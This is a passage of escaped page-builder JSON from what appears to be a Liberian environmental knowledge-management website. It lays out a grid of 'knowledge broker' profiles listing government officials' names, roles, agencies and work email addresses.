questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong>\\n<\\/br>\\nManager, Strategic Planning Unit\\n<\\/br>\\nForestry Development Auhtority\\n<\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7f527f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"baed7dc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b97200c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88a